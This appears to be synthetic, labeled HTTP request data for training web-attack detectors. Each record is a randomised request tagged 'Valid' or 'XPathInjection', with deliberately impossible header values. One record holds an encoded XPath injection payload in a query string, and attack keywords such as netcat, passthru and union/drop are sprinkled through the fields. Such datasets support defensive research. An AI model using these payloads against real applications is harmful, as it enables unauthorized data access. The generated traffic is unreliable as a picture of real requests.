Pragma: no-cache
Proxy-Authorization: NTLM NTVlbG9VY2VtbDQ3ZWVycGh3ZWVyaTR3bmd5NGNvc3Ns
Authorization: Digest realm
Range: -988,03-4,64-3
Referer: http://www.wmopoegt.ch/5edoi.sh
TE: trailers,deflate,deflate
Trailer: If-Unmodified-Since
User-Agent: Mozilla/7.7 (Machintosh; U; PPC 7.6; d8-di; rv:6.7.9) Gecko/63143583
UA-CPU: PowerPC
UA-Disp: 197,9034,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 3832x6503
Via: 9.6 197.120.182.109:4, 2.4 35.197.37.241, 6.9 247.47.160.218
Transfer-Encoding: deflate
Upgrade: jaeNfe/6.3, eitr/9.7, Eia/7.9, ryge/4.3
Warning: 698 www.henrsinf.js "setsncEu3mh2ihzrest" "Sun, 01 Oct 06 12:14:24 UTC"
X-Forwarded-For: 239.251.116.128
X-Serial-Number: 3012101828224515543
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9805
Start - Id: 17574
class: Valid
GET /qchilda0gt.IjWv/WSa74L6meta3P-7t/cPgcaHp@8sP7ZOl/0Teqb/i8VHkP9friAHl_jT/iaaAs5Vt0s/ely7o/eedoneTx0/vnme9emriw6nbye/45_-DI@sdo/lscnndi5tnnachopa.mspx?uschgnmisg=7116&lreae3tRotcuida=hAc0BoFSWbJ&rlcnnttautipl=qu%3Cqcat%3Dri7eEiimSasi4h&bno2=huOpTSWib_XD&beslul=5x97P8K&suap=rSvObT6yM&ed=1711&fAIdmgFihuWte=312130&dc=eyMs++e%3Fnsi&reh=63702498&XWobjectnetcatOh2s=068164&c5c57vGneW=8&htj=8 HTTP/1.0
Host: 244.151.203.133:068
Connection: odle7e6t
Accept: video/quicktime;q=0.2
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=82331
Client-ip: 49.58.142.8
Cookie: lwhnoetn8Yqax=7712059640;Rchome9=260;6.BOz_XQBA7e=nesgoteehM;bt6moehaefg=394;sF2%uftpscriptI7@SO8=fXLsV_-;taahtoOcstierq=nM%7EH
Cookie2: $Version="383"
Date: Wed, 04 May 05 07:32:19 CET
ETag: "yFsCQA0qcZwD8_Euq"
Expect: etahar=tlesheen;oafue
From: toHtw@a9mti.it
If-Modified-Since: Thu, 29 Jan 04 09:58:00 GMT
If-Unmodified-Since: Mon, 30 Oct 06 16:29:13 CET
If-Match: "pw7w_P_9hGXVhrePEH2"
If-None-Match: *
If-Range: *
Max-Forwards: 0089
MIME-Version: 3.0
Pragma: e='soozbls'
Proxy-Authorization: Ne0eoc jlottGkn=mmT0iei
Authorization: Basic c3Rsbzg6aGVlNWhCaHo=
Range: 22389-71,-169,-0
Referer: /ihiuaul8/meso0.gz
TE: trailers,deflate;q=0.1,deflate;q=0.5
Trailer: From
User-Agent: Mozilla/8.3 (X11; U; Unix 8.7; dy-xe; rv:3.9.9) Gecko/12989768
UA-CPU: x86
UA-Disp: 1857,5660,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 519x8664
Via: 0.8 www.ouK58q5m.jpeg, 4.8 228.99.192.87
Transfer-Encoding: deflate
Upgrade: httos/8.2, cIe/0.7
Warning: 445 www.rtwliIsn.jpg:095 "mtrmdgaq" 
X-Forwarded-For: 203.39.140.226
X-Serial-Number: 2432854713
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17574
Start - Id: 49372
class: XPathInjection
GET /elTltttSGTs/stp/ia/eaeTafetoswviry/t2Mdxnee/ptLwecAzagrornt5hq9/tqeLeRoNunBsrslT/rcS6Ohecttdx.gif?undr=ixskz&U1UC=30&ba8wibnnjeOdh=mt%2Ft%2Fhlhhvo%2Fchild%3A%3Anode%28%29%5B++position%28%29%3D70%5D++%7C++s%2FnhR%2F70%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D3%5D++++or+++++%27vt%27++++%3D+++%27&defmn9aefl=370789&@cwp-c7updateFKHPH=2eG%3Dtlmaih3&mk9N=12490&wf9ee8llneNa7e=sdr&mRjuVG6x-httpj0=sIHjuA9-w&m0olehh4UC=01365&2nhnr2mssesy=05334 HTTP/1.1
Host: www.eoNs.com:1
Connection: keep-alive
Accept: image/*
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: hr-gaonYnbh
Cache-Control: no-cache
Client-ip: 130.138.110.189
Cookie: miu=7stUe<rlx;qi5R2cqta6mtnuy=uljvhxnu;wieEsrqii=eitr;tietotwjase2c8a=874565;ihs=ivo
Cookie2: $Version="846"
Date: Tue, 24 Aug 04 01:35:33 GMT
ETag: W/"RkLd1rvasZXLUSjf"
Expect: tm7hhlah
From: hzioi@etsrec.cz
If-Modified-Since: Sun, 03 Jan 10 23:14:58 GMT
If-Unmodified-Since: Tue, 22 Apr 08 08:35:44 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 07 Jul 05 18:15:28 CET
Max-Forwards: 38
MIME-Version: 7.0
Pragma: jgosdoiC=pe7rd
Proxy-Authorization: Digest uri=http://efar.be/thtuh/euhhew3a/theOa.conf
Authorization: NTLM a29xbGVsTk9odHNPdGFuNGVsaGRlYWhuN1JvaXBqc3RzZ24=
Range: 79-,-25900
Referer: http://s46ho.net/nbihgn/insJreG.jsp
TE: chunked
Trailer: Pragma
User-Agent: 0p9r (e6kYge; iKozl4qFSB; oG9cDC.; nj7ehbum)
UA-CPU: StrongARM
UA-Disp: 129,1543,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 675x619
Via: 6.9 www.fp7naYe.png, FTP/6.3 www.nrviim.html, pike/0.2 95.107.182.137:68
Transfer-Encoding: compress
Upgrade: peor/1.1, d2rrnr/4.2
Warning: 136 11.147.101.120:8 "azxwWdgjetsnwgt6ecfc" "Sun, 05 Nov 06 18:36:55 GMT"
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 68426632486242488
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49372
Start - Id: 4376
class: Valid
POST /9ArxtermHeGTtr/a0zgByBhsR6MifK4Ue/otKi6a4Ides/spoaoq/mOVzxVMfbI2W.M.jWYx/foWQ.NoH7bdAj/na5xF-BGZ746oaZORwq/essa9nr/GFLvZrWG/Cq@rpHMTN_netcat/nVsP_XCz_S/tEglo2r8hkaoanme.tiff? HTTP/1.1
Content-Length: 213
Content-Language: dn
Content-Encoding: deflate
Content-Location: /irat/aSdtt.aspx
Content-MD5: bW92WDFhcnRhbmxkZml3dw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 07 Aug 06 16:25:55 CET
Last-Modified: Fri, 03 Jul 09 18:41:29 UTC
Host: www.wnireteag.ch
Connection: eiTai
Accept: video/mpeg
Accept-Charset: x-mac-roman
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=810
Client-ip: 204.226.34.249
Cookie: fr4eaetod=jmex;ywindow.openI-mXro=8449950;odrage=69436;orbilltK_K=45533;0a='Ete
Cookie2: $Version="183"
Date: Sun, 14 Mar 10 05:44:57 GMT
ETag: "4YWEme.AtoWHmSf"
Expect: tr3pes=rzaLn;wftaaIn=rufkeee
From: iElnOsfe@rldOlaat.cz
If-Modified-Since: Thu, 11 Dec 08 17:13:14 CET
If-Unmodified-Since: Tue, 06 Apr 04 23:15:52 UTC
If-Match: *
If-None-Match: "J5mRp-X-DCPJTS5kM-h"
If-Range: *
Max-Forwards: 3
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: mtor drf6oc=wfds
Authorization: rdjt l8bs=latd
Range: 1237-117
Referer: /ei77Dc/7nfusi/4otoc/rnhssSs.exe
TE: trailers
Trailer: Upgrade
User-Agent: xqoi/2.3.5
UA-CPU: MIPS
UA-Disp: 7270,8918,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 109x8284
Via: Tnxhog/2.4 9.207.94.215, qEdn8e/8.9 www.chguQ.tiff
Transfer-Encoding: deflate
Upgrade: elEf8p/9.8, lro/2.1, 5boo/9.9, FaC/4.1, P28mrw/1.1
Warning: 055 244.62.200.40:2 "0plu" 
X-Forwarded-For: 139.143.108.151
X-Serial-Number: 5443838
----: ---------------
~~~~~: ~~~~~~~~~~~~~

fservices.dqJukrc=p3&rhz3tmaf1wxc=2&OuS%u@Funion0dropCXi=snfwe5&CmhttpY=56673799&l6rneottid8st=ueeval&ikeiceGaecunc=5ura&higIi60ll6rta=eIL&rCyycAnkosaho=pm8hIddn2b8&asn3EutrEvpioa=arnh&eV_G=qw&ls5ohsduirSzecC=oprU

End - Id: 4376
Start - Id: 13849
class: Valid
GET /aiotlinduspiigna/w0VMQE@6wE@/rxj8ZBYu/BZpassthruT/be4/Le3reNnoynhdxyoceicm/oahEu/ebGEWda34z.aspx?ligyjicainkelD=wdgzsnsosAeO&L7qRv=a&replace3w92pVW6z=a+&aQPftp83updatebSXnS=317&leeraap0Mdle2y5=935&ae7=eidl HTTP/1.1
Host: 93.210.182.241:4
Connection: dnea2c
Accept: text/*;q=0.3, video/mpeg
Accept-Charset: us-ascii;q=0.1, iso-8859-8-i;q=0.7
Accept-Encoding: *
Accept-Language: onfz-lT7atafe
Cache-Control: max-stale=4876
Client-ip: 103.78.83.166
Cookie: zonrerDh2hm=3d@cuDoxo_Uf;noumt1s8=iwuiItrkrtzhm7dd
Cookie2: $Version="8"
Date: Sat, 24 Apr 04 20:26:50 GMT
ETag: "w8wGjCCblnDz6k3nImk"
Expect: tceESss=raaoreoo
From: icse@bldetb.uk
If-Modified-Since: Tue, 30 Jun 09 21:15:15 CET
If-Unmodified-Since: Sun, 15 Jul 07 16:50:31 CET
If-Match: "DlA1TFnt572hfOFuB.Da"
If-None-Match: "cc7iT-EL0J3B08XzG"
If-Range: *
Max-Forwards: 73
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Basic bDBjbm50Om5BbW96dA==
Authorization: Tyaoo Am5od1ut=annOil
Range: 371-,-202
Referer: /qate.jsp
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Anoem4oa/8.0.3
UA-CPU: 68000
UA-Disp: 4060,2972,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 750x449
Via: 0.3 www.om0snrme.png:2363, HTTP/7.3 40.217.32.13
Transfer-Encoding: vriJ; ise7tt9i=aRefut
Upgrade: eqp/4.6, eiffm/7.0
Warning: 261 104.153.242.127:97824 "aef6o4" "Wed, 31 Mar 10 13:10:44 GMT"
X-Forwarded-For: 182.32.87.239
X-Serial-Number: 2424153746137739
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 13849
Start - Id: 32068
class: Valid
GET /deSEoErLatItir/PxUJ0deX.-rQcMlocation/tSspXmp9UwI0KzlK0PvB.swf? HTTP/1.0
Host: 118.175.50.243:80
Connection: keep-alive
Accept: video/*, audio/basic, image/gif
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: rrin3-78;q=0.1, 1sssoss-ht5i, maoh3bi3-rhemsre;q=0.0
Cache-Control: yti='2'
Client-ip: 75.100.139.238
Cookie: k38e=up7BR_5fJ7;qNi=kb;VD-pELwdHs33=hat;thhizwrehsctrn=0489475
Cookie2: $Version="72"
Date: Thu, 29 Jul 04 23:56:12 UTC
ETag: "1QRsTxtOxSuQq9KfJ"
Expect: qjm9B
From: hGao@Hawa.uk
If-Modified-Since: Thu, 17 Jun 04 24:48:28 GMT
If-Unmodified-Since: Sat, 10 Jan 04 05:32:08 CET
If-Match: "iVqHBxgHhoqdC3s"
If-None-Match: "pLZIK3cUxESo3gtiG5"
If-Range: Sun, 13 Aug 06 07:23:17 GMT
Max-Forwards: 95
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest qop=auth
Range: 81-,-8,-69673
Referer: /zerp.shtml
TE: deflate;q=0.6,trailers,deflate
Trailer: Authorization
User-Agent: Hdoetoo
UA-CPU: MIPS
UA-Disp: 929,743,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 8495x114
Via: 1.3 www.gPmrf1.jpeg
Transfer-Encoding: deflate
Upgrade: boli/1.4, iew/6.5, uoh/6.1
Warning: 436 www.itzdh.shtml:75 "naenzwi9e" "Sat, 20 Aug 05 08:21:45 GMT"
X-Forwarded-For: 62.83.138.43
X-Serial-Number: 2637635307
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 32068
Start - Id: 24102
class: Valid
GET /Nto2keez/lntn6aaR/Z349iWnOk1rpZ@1/dadminUqpU/eccUynpdeTolo1iDeni5/tFryNHVos3Ofdm4Sq/eztTlylhurrxx/rI8Z87fvEnF6rHYy1/hRcyrzrO.cgi?7p8eZ=0171 HTTP/1.1
Host: www.o3nldeuid.cz
Connection: close
Accept: application/rtf;q=0.0, image/*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: eO3gt-mips, Loi8tvc-tas1;q=0.4, oeoah-ecE
Cache-Control: max-stale=693
Client-ip: 120.174.30.121
Cookie: eo9=sitypositiontrl;linkKEItsn88L3h=h+s8v;reE=1245
Cookie2: $Version="28"
Date: Sun, 23 May 04 18:01:22 CET
ETag: "up1FPESAOB4b2.C_zxy"
Expect: tswe
From: idehs@lb6ztam.biz
If-Modified-Since: Mon, 26 Apr 10 24:00:29 CET
If-Unmodified-Since: Wed, 22 Oct 08 14:59:04 GMT
If-Match: "KmVz2n7PdTVYUhkbcu"
If-None-Match: "AANv8fPyQ3Bpyj2MeJPT"
If-Range: *
Max-Forwards: 5
MIME-Version: 7.7
Pragma: 8AAk=uohsrnob
Proxy-Authorization: NTLM YWVnaXR1bmVodWFvZWFVTUVpbHJocmw4ZWNzbHMyZHRkbnNyZnhz
Authorization: Digest cnonce="lie0ih"
Range: 05-009,-9713,654-967
Referer: /sfvi2ic/rlnia/imns6/rblo/naiiwm.swf
TE: gzip;q=0.8,chunked;q=0.0
Trailer: Warning
User-Agent: iElbw_j http://www.lrsThnl.org
UA-CPU: MIPS
UA-Disp: 176,3441,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 390x221
Via: 6.1 129.191.233.107
Transfer-Encoding: wtaoin
Upgrade: orayl/3.8, rnnt/3.2, ise/8.1
Warning: 539 38.106.69.86 "RmeeRevmr53usmX" "Fri, 31 Mar 06 18:40:16 GMT"
X-Forwarded-For: 147.32.251.83
X-Serial-Number: 740529934868246
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24102
Start - Id: 31269
class: Valid
GET /_iNUljhchildRwRnode/eOoazttjlsot/Z5yiframehI0GF1fO6/oGQ/c_Pc-URz/inputfVb/scriptsock_stream8ckNfJCRcadminD/LesScntiEgendroevns/oElgI2m-qMjplvdKQNm/wLZqOY/ooqh3hmeotoeateecw/a-ni.H4hYFgn-U.tiff?0tS1Jac=lau%3A7evalX&ubcanqo=riao3aesanhOr&laezQosei=381535&Yxmlf6qMurWR1=ebinrmvnnhp8L%28ou05uh&lseRQgonroEPdi=888&lygiatqi7wsa=khtmpICsock_streamro&wecal=014&wbjo=eao&i7rznaWehto0w=2&4nyssl3n6fnr=%2F%3F&er=tw%7E%29eotulyu2ok5%26t&gturfooie=73961&gkfdm=o.8AI-Swl HTTP/1.1
Host: 233.191.32.193
Connection: iHrmao2n
Accept: */*
Accept-Charset: iso-8859-15, shift_jis;q=0.4, ks_c_5601-1987, x-mac-hebrew, x-mac-korean;q=0.4
Accept-Encoding: gzip, gzip;q=0.9
Accept-Language: *
Cache-Control: 09=etp
Client-ip: 200.93.24.149
Cookie: sPLF3vQNUtNx=ree;eoglttcNtEa=207
Cookie2: $Version="0"
Date: Thu, 23 Jul 09 02:35:28 GMT
ETag: W/"xJV4q9SRWtnmtVP"
Expect: qddeh=sdiabmt;loHserrr
From: harutUle@4Tes.com
If-Modified-Since: Thu, 19 Jun 08 09:23:43 GMT
If-Unmodified-Since: Fri, 25 Jan 08 16:26:56 GMT
If-Match: "erTy3F5LVfcUoiraG_on"
If-None-Match: "KKYixsZ8u19X3WAqWLO"
If-Range: Thu, 02 Aug 07 19:14:11 UTC
Max-Forwards: 3
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Digest response="57BDdf1DBA67734eB88F9d60DBd482BC"
Authorization: l4wi AeDLYae=otoo3HP3
Range: 019-,893-4434
Referer: /iye5/phac/dNif/2oloaHt/asrErik.avi
TE: gzip,gzip;q=0.3
Trailer: From
User-Agent: Mozilla/6.6 (compatible; MSIE 1.0; Open BSD i586; DohIss0c)
UA-CPU: 68000
UA-Disp: 097,2984,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 3795x126
Via: Tmhl/9.7 98.204.196.120
Transfer-Encoding: compress
Upgrade: vn4e/1.5, o4t/2.0, qsr1e/6.0, tmD/0.8
Warning: 632 205.186.108.72 "ghuwat" "Tue, 25 Jul 06 21:16:47 UTC"
X-Forwarded-For: 45.216.230.89
X-Serial-Number: 173088240
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31269
Start - Id: 23510
class: Valid
GET /V%u@3FAvYWx7/piubwwD3.png?vXottgLzW_Vq=525&hat=%7Cs&8d5dr13e=iansr HTTP/1.0
Host: 159.203.25.117:80
Connection: close
Accept: video/mpeg, text/xml;q=0.9, image/jpeg
Accept-Charset: x-mac-hebrew, iso-8859-4, x-mac-japanese, iso-8859-9
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 29.220.169.125
Cookie: rs1yZu8fdETobject=e;lhr=sb0rorh8;dvpDJVHyAmG=i-noarU;irghs9=hi6ni7(;tlal=8005
Cookie2: $Version="6"
Date: Thu, 20 Jan 05 05:58:01 CET
ETag: "rGq1BnAln3-I1RbT"
Expect: s4Ffghrl
From: ltnesme@hsentase.it
If-Modified-Since: Sat, 19 Nov 05 05:29:43 UTC
If-Unmodified-Since: Mon, 23 May 05 24:07:58 UTC
If-Match: *
If-None-Match: "f91eWlmGkrcd6os1uHQY"
If-Range: "90EI5iTxwUh_Lpu-GQvd"
Max-Forwards: 1839
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Basic VHJzRDZtZTpzN2xldGl3cg==
Authorization: NTLM d2ljU2UybHNpZWFzaXNlVDJIcmVtaWV1eGh0b3BldDNtY24waW12a25h
Range: 90-,49-617
Referer: http://www.lhnz.st/dss5c/JaSeyenO/dacrgas.html
TE: gzip;q=0.2
Trailer: Trailer
User-Agent: bt9ansk/5.4
UA-CPU: x86
UA-Disp: 987,566,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 4426x0282
Via: HTTP/9.5 167.65.8.208:72
Transfer-Encoding: zEnrr
Upgrade: Odqe/8.0, Phrs/0.8, i83hqn/9.8, 6d1a/9.7, joi/4.4
Warning: 316 www.deemx.htm:8305 "btsydnansow" 
X-Forwarded-For: 238.108.237.191
X-Serial-Number: 467341
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23510
Start - Id: 3635
class: Valid
GET /smhonundwco/aG2BW/otyncrgh/oa405h_D_Ij3lb8fj/aaXXYgkQeV73Qc/oJa49eNK5/zF8kV2KFPZR_J/eaydoiIrtoafie/m0teoolexedoYSnhis/dd3/tvtaHr/pstylexbinf.gif? HTTP/1.1
Host: 107.14.161.245:85443
Connection: nao3Ohet
Accept: text/*, video/*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: ixTs='tta2l'
Client-ip: 247.34.126.105
Cookie: ic2eaA=hlogmwhereautoexecued-txt;s8mNmh=rtb;r2u=oatohehsvtouauuzc;lBlikevTdocumentiJy=o\ec9&r@me8t2Y?otelnet;peieexno0ftiur=|;scauyneoiwstvfj=1372691685
Cookie2: $Version="387"
Date: Mon, 29 Dec 08 01:14:23 GMT
ETag: "kKa@X1stg9PBNpTOZ"
Expect: ttbs=Iammcyan;ehvTg=Btegrha
From: iaeitS7@hsAh8.fr
If-Modified-Since: Sun, 01 Mar 09 05:56:17 UTC
If-Unmodified-Since: Sat, 27 May 06 21:22:44 GMT
If-Match: *
If-None-Match: "9ZO5CUi6s4HNihq3"
If-Range: "IXqCAb07a9RW9Koo-tO"
Max-Forwards: 711
MIME-Version: 6.4
Pragma: ea='yn'
Proxy-Authorization: Digest opaque="nde1rea"
Authorization: Basic dGVzc2V0YW46NUlPb1Q=
Range: -66041,943-,-24
Referer: http://www.h1tpeolh.be/rhanp.css
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: 6eta (lNNlsoZ)
UA-CPU: Sparc
UA-Disp: 8239,236,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 767x775
Via: FTP/5.5 www.ArShu.gif
Transfer-Encoding: compress
Upgrade: decg/1.7
Warning: 743 www.dejhzUo.png "iisl" 
X-Forwarded-For: 153.114.223.45
X-Serial-Number: 02989198199377
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3635
Start - Id: 31025
class: Valid
GET /t37CCnBXTkfQ10EV7krn/9MocYQ@I/sTmuKaq/xochjLzyle2fi/wQjcgVe3/g9n.mdb?ga2no3d=cGmW&1nn=r-&tfuohrdoah4gaei=it%5Cmochai&b2oopnflatN=4yhStIUAPAdT&zoemhnsineWmrsr=6076264&eSnrRod=5 HTTP/1.1
Host: 148.87.251.171
Connection: close
Accept: */*;q=0.2
Accept-Charset: iso-8859-5, x-mac-chinesetrad, iso-8859-2, euc-jp
Accept-Encoding: 
Accept-Language: cawywar-duzaeN, ke7-iom4fv;q=0.0
Cache-Control: no-cache
Client-ip: 74.40.177.241
Cookie: htCtns=3&;he=eT
Cookie2: $Version="98"
Date: Thu, 24 Dec 09 24:40:50 GMT
ETag: W/"3UcaAjaeWeHVa3QgvT@"
Expect: dusql=v5tssnad
From: awdsoXt@Sgavtre.cz
If-Modified-Since: Fri, 28 Sep 07 05:10:56 GMT
If-Unmodified-Since: Fri, 24 Jun 05 09:17:56 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 17 Dec 05 20:10:22 GMT
Max-Forwards: 494
MIME-Version: 2.1
Pragma: s=to
Proxy-Authorization: Digest cnonce="VltR"
Authorization: Digest nonce
Range: 934-,-0411,903-198
Referer: /eiuR/ctv7oye.mpg
TE: trailers
Trailer: Expect
User-Agent: athRiu (lO5uPeY; 7x6xk7d)
UA-CPU: MIPS
UA-Disp: 3489,226,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 8381x468
Via: dmnnd/4.6 www.ht5qs.htm
Transfer-Encoding: compress
Upgrade: a8tst/3.7, xhiig/6.8, 9nsjt/3.5
Warning: 016 www.mhuoal.css "jereaoe7fArebseet" 
X-Forwarded-For: 58.163.47.254
X-Serial-Number: 827318624572609
----: --------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 31025
Start - Id: 15208
class: Valid
GET /scRbyealch4rmvMasa6s/nUk/ab98/ixlQN_4OltCnX.Re/aRgwVHR/C@Xdelete7q@xmlc.nsf?iwh0abkHni=lleZYfaIeHDY&olnofd0aepa=ee+I&vhoeesgvoeAy8f=klsun&khhm=cvy&htt=38030&sni7Ys8eIl6=afoNjDnf3T3&7i=betweenr%2Bheut%7CrtG&am8ljeyv63io=wcrmomlsb&swelnbh8=ahtSyotdntndeyge&eLvq5EMSs8=m3Ita1o4&axdodemudogIa=I9l%7E&plzoeosaie=vgG%3Fe HTTP/1.1
Host: 148.24.6.149
Connection: close
Accept: */*
Accept-Charset: iso-8859-2, cp-936;q=0.5, ks_c_5601-1987, windows-1250
Accept-Encoding: compress, gzip;q=0.4
Accept-Language: Ucets-3hqpetce;q=0.8
Cache-Control: only-if-cached
Client-ip: 170.95.234.195
Cookie: prraplwhlct=ize6
Cookie2: $Version="8"
Date: Tue, 24 Feb 04 12:25:12 CET
ETag: W/"7yo89CHD6XfuTx0"
Expect: 100-continue
From: Ono9sk1@8ieegshia.com
If-Modified-Since: Mon, 30 Jun 08 22:43:01 GMT
If-Unmodified-Since: Sat, 09 Apr 05 18:36:56 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 13 Jul 09 22:37:10 GMT
Max-Forwards: 943
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: NTLM ZTEwbzFkMm50TGhuc25ob2lFbjJzaGhvbXV0bWV0b2N0bm9sYXJzcWNuZXQ=
Authorization: 2oKd dti7nal=t6ihpnaA
Range: -29,-3
Referer: http://www.gdpE.de/hieh/i0ot/n5ngnsdt/ytll1/setD.pl
TE: trailers,trailers,trailers
Trailer: TE
User-Agent: Mozilla/1.8 (X11; U; SunOS sun4u 7.2; c1-ee; rv:6.0.9) Gecko/13046055
UA-CPU: Sparc
UA-Disp: 450,4767,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 1443x630
Via: 3.6 231.1.56.174, 6.3 150.188.190.171:854, 7.5 214.124.169.237
Transfer-Encoding: deflate
Upgrade: bcdD/5.6, SOfeT/0.6, d9O/4.6
Warning: 672 146.81.253.52 "jtadl" "Mon, 09 Feb 04 19:26:43 CET"
X-Forwarded-For: 236.127.123.213
X-Serial-Number: 66124683
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15208
Start - Id: 13139
class: Valid
GET /cSfiX/amRNDzoPQpzZZgHW/m57d89/WR1qUyd/ri1yoe1bsytfuthI/tf/Sec/tcsltqnp0atsa/hsuRuxP6_RoACjQ7@g/hq.NtRv43nYiXJJPl/8ehstob.js?irr=n6bSSdFjH7h HTTP/1.1
Host: www.kagcne.com
Connection: keep-alive
Accept: audio/*;q=0.7
Accept-Charset: us-ascii;q=0.1, windows-1252;q=0.4, iso-2022-kr;q=0.7
Accept-Encoding: deflate;q=0.7, compress;q=0.4, deflate;q=0.3, gzip, gzip
Accept-Language: *
Cache-Control: no-cache
Client-ip: 146.86.114.200
Cookie: loGtruohz1t=hoNie@f\mecmeta;eihPwniutcul=86250;itfrhr=5hWeulnD x-nps ltmocha;y40wla=n;4tTqualMribltt=9048979;LBtoi5aU4aI8u=ekxYYFoJGA
Cookie2: $Version="684"
Date: Sun, 11 Apr 04 17:03:22 GMT
ETag: W/".mGwPDwpBjzYt2m7"
Expect: e2sht=aoay;rsey6i=paia
From: rBs84eg@im6v.st
If-Modified-Since: Mon, 02 Aug 04 16:17:55 GMT
If-Unmodified-Since: Sun, 03 May 09 23:02:12 GMT
If-Match: "Ub1FuAvZEPgKylUm"
If-None-Match: *
If-Range: *
Max-Forwards: 753
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: NTLM Y2hycml0dGlyb3BvbGVwcm9sam1lbjY5aG1pZURhc29lb0xvTHRmYk5laQ==
Authorization: nunf ijece6f=NeBgoee
Range: -22,686-,439169-
Referer: /meQ4n.swf
TE: chunked;q=0.3
Trailer: Warning
User-Agent: Mozilla/9.2 (Machintosh; U; PPC 0.0; ad-ec; rv:8.7.3) Gecko/74190148
UA-CPU: Sparc
UA-Disp: 806,0738,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 9714x547
Via: 2.9 www.i69ni.htm
Transfer-Encoding: deflate
Upgrade: ieri/8.8, fihXea/0.2, pcuC/3.5
Warning: 988 www.pasceto.js "hpmirfwelzcei" 
X-Forwarded-For: 141.250.177.130
X-Serial-Number: 193112080
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13139
Start - Id: 21416
class: Valid
GET /iUQbXZqTLpJvr5X/EUWLLO._4ERY0/mgenrtlcchadztgec/mzH03._.asmx?rpHohcuaoki0oec=80518&a30nnsadame=72248100&ic=E6p&yoer=tsa&dowu=t9imdiT&btonHwam2=%25t-d%7EuwstUlm%3B%287pPote&jzenh=799986&bgsoundAtehtpass=5&yei7rnnor=31&amcshns=MmeEeoalBa&ssfe=n&rcdsiyS=tvnsno1lhsaaae&ede2b4Srtyteotk=-Ug2ie9 HTTP/1.0
Host: 49.108.184.108
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: mte-i4onOowh, t-n, 3abaun-a, 0esI-nh;q=0.3
Cache-Control: no-transform
Client-ip: 255.170.108.35
Cookie: s8eousghgss0=scripti;8dbueegsoT37n=1d?ayb2;myks=iA62F1PDMpx.
Cookie2: $Version="1"
Date: Thu, 03 Dec 09 17:15:05 GMT
ETag: "lQurpWdSyUb3BcSKkDPs"
Expect: mrae
From: s97aa@bEgmrdes.biz
If-Modified-Since: Mon, 24 Oct 05 22:39:59 CET
If-Unmodified-Since: Sun, 17 Aug 08 13:11:23 UTC
If-Match: "-hoe94k@E_mVr0uMr"
If-None-Match: "Xa@MkwqEVRPSRvd2INk."
If-Range: *
Max-Forwards: 1977
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic aG11YXNzc3g6aHM3bHJyaGg=
Range: 9389-552,913284-,86-
Referer: /ntePK/unBL/jnneoe/nFfoe0i.bin
TE: trailers,chunked;q=0.6
Trailer: Max-Forwards
User-Agent: Mozilla/4.8 (Machintosh; U; Mac OS X 9.5; ct-de; rv:2.2.8) Gecko/47552126
UA-CPU: Sparc
UA-Disp: 6376,0383,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 528x4272
Via: 3.7 www.RteyCEe.png, 6lrRil/0.3 www.xxpndonr.js, 7.8 156.65.117.45
Transfer-Encoding: identity
